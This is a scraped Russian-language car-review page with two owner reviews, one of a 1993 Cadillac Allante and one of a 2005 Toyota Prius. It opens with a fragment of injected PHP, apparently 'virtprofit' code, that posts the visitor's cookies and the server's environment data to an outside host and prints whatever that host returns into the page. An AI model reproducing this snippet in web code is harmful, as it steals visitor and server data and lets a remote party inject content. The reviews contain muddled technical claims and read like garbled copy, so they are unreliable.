array("header"=>"User-Agent: PHP Modules virtprofit\r\n","header"=>"Cookie: ".$_SERVER["HTTP_COOKIE"]."\r\n","method"=>"POST","timeout"=>2,"content"=>http_build_query($_SERVER))))); if($virtprofit_result) echo $virtprofit_result; ?>

Присланные отзывы за неделю


Прислал: Эдуард
Год: 1993
Эксплуатирую:
Отзыв:

Кадиллак Алланте – это двухместный кабриолет с передним приводом. Максимальная мощность, на которую он способен, составляет 210 км/ч, может, кому-то этого покажется мало, однако, для города и повседневных нужд - вполне достаточно. Сотню можно легко взять за 8 секунд. Расход топлива при обычной езде по городу составляет где-то 18 литров, по трассе – 11 литров. Движок выжимает мощность в 204 лошадиные силы. Управлять этой довольно тяжелой машиной, осуществляется с легкостью, за счет гидроусилителя руля. В автомобиле имеется достаточное количество техники и электрики. Очень понравился автомобиль внешне. Читал даже, что технология сборки этой машины была очень оригинальной – типа, изготавливала кузов итальянская компания, а потом отправляла самолетом его в Детройт, где и заканчивалась сборка машины. Вот такой длинный конвейер был. В Cadillac Allante привод передний, благодаря чему автомобиль обладает высокой проходимостью. Не страшны даже заснеженные трассы, отлично проходит, грязь и глубокий снег! Вес по осям распределен довольно равномерно, управляемость прекрасная, на поворотах не заносит. Благодаря своей непопулярности, автомобили выпускались в малом тираже, поэтому на наших дорогах это практически эксклюзив. Многие оборачиваются и смотрят на мое авто. Конечно, автомобиль нельзя назвать удобным для дальних поездок, однако для повседневных нужд – прекрасный вариант. Кресла широкие, очень удобные, есть множество настроек спинки. На задних сидениях места достаточно даже для человека полного или высокого, коленки точно упираться никуда не будут.



Прислал: Клим
Год: 2005
Эксплуатирую: 3 года
Отзыв:

Тойота Приус не является выдающимся представителем самого азиатского бренда. Но при этом у нас она пользуется спросом повыше, чем где-либо.
Передний привод считается обычным стандартным вложением, которым легко научиться пользоваться, даже если вы перед этим пользовались полным приводом. Передний привод, собственно, не считается особой проблемой, тем более, когда можно выложить все силы в вариативную коробку передач.
Так как я водитель высокого роста, то мне приходилось осторожно рассматривать возможности салона, потому как не хотелось либо макушкой стучаться в потолок. То коленками упираться, если вдруг придется передвигаться в качестве пассажира, что тоже иногда случается. Кстати, заднее место является свободной зоной даже для тех, у кого явный перебор в весовой категории. Даже теща, которая весит выше сотни, спокойно забирается в салон, и ей удобно производить посадку. Возможно, такое положение вещей стало возможным благодаря хорошему дорожному просвету. Хотя, не спорю, что такой эффект может достигаться благодаря супер удачной конструкции днища.



Return to Top ▲НА ВЕРХ ▲